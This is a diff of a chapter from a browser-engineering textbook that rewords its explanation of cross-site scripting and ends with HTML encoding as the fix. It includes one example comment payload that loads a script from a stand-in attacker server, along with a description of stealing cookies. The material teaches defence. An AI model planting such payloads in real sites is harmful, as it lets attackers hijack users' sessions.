browserengineering/book/book/security.md

 ```

 Note that `entry` can be anything, anything the user might stick into
-our comment form: even include a user-written `<script>` tag!
-Let's
+our comment form.
+That includes HTML tags, like a custom `<script>`
-imagine that you're logged in as one user, maybe `crashoverride`, but
-would like to gain access to another username, maybe `nameless`.
-You
-could post the comment:
+tag!
+So, a malicious user could post the comment:

     Hi! <script src="http://my-server/evil.js"></script>

-Our server would then output the HTML:
+The server would then output the HTML:

     <p>Hi! <script src="http://my-server/evil.js"></script>
     <i> by crashoverride</i></p>

-Our browser would then download and run the `evil.js` script.
-Then
+Every user's browser would then download and run the `evil.js` script,
-`evil.js` could access `document.cookie` and do something evil, like
+which might read `document.cookie` and send[^how-send] it to the
-sending it to an attacker who could then impersonate you.
-In a real
+attacker.
+The attacker could then impersonate other users, posting as
+them or misusing any other capabilities those users had in our
+service.

-browser, `evil.js` might use [`fetch`][mdn-fetch] to secretly send that cookie to
+[^how-send]: In a real browser, `evil.js` might use
+    [`fetch`][mdn-fetch] to secretly send that cookie to the
-the attacker's server, but more complicated attacks work in our
+    attacker's server, but more complicated attacks work in our
-limited browser as well.[^no-fetch]
+    limited browser as well.
+For example, the evil script can replace
+    the whole page with a link that goes to their site and includes
+    the token value in the URL.
+You've seen "please click to continue"
+    screens and have clicked the button unthinkingly; your users will
+    too.

 [mdn-fetch]: https://developer.mozilla.org/en-US/docs/Web/API/fetch

-[^no-fetch]: For example, the evil script can replace the whole page
-    with a link that goes to their site and includes the token value
-    in the URL.
-You've seen "please click to continue" screens and
-    have clicked the button unthinkingly; your users will too.

-The core problem behind these problems is that user comments are
+The core problem here is that user comments are supposed to be data,
-supposed to be data, but the browser is interpreting them as code.
+but the browser is interpreting them as code.
+This kind of exploit is
-This kind of exploit is usually called *cross-site scripting* (often
+usually called *cross-site scripting* (often written "XSS"), though
-written "XSS"), and the data-misinterpreted-as-code issue is a common
-security issue in all sorts of domains.
+misinterpreting data as code is a common security issue in all kinds
+of programs.

-The usual fix is to use a special encoding to avoid interpreting data
+The standard fix is to encode the data so that it can't be interpreted
 as code.
-For example, in HTML, `&lt;` is supposed to be interpreted by
+For example, in HTML, you can write `&lt;` to display a
-the browser as a textual less-than sign.[^ch1-ex] Python's `html`
-module can do this kind of encoding:
+less-than sign.[^ch1-ex] Python has an `html` module for this kind of
+encoding:

 [^ch1-ex]: You may have implemented this as part of an [exercise in
     Chapter 1](http.md#exercises).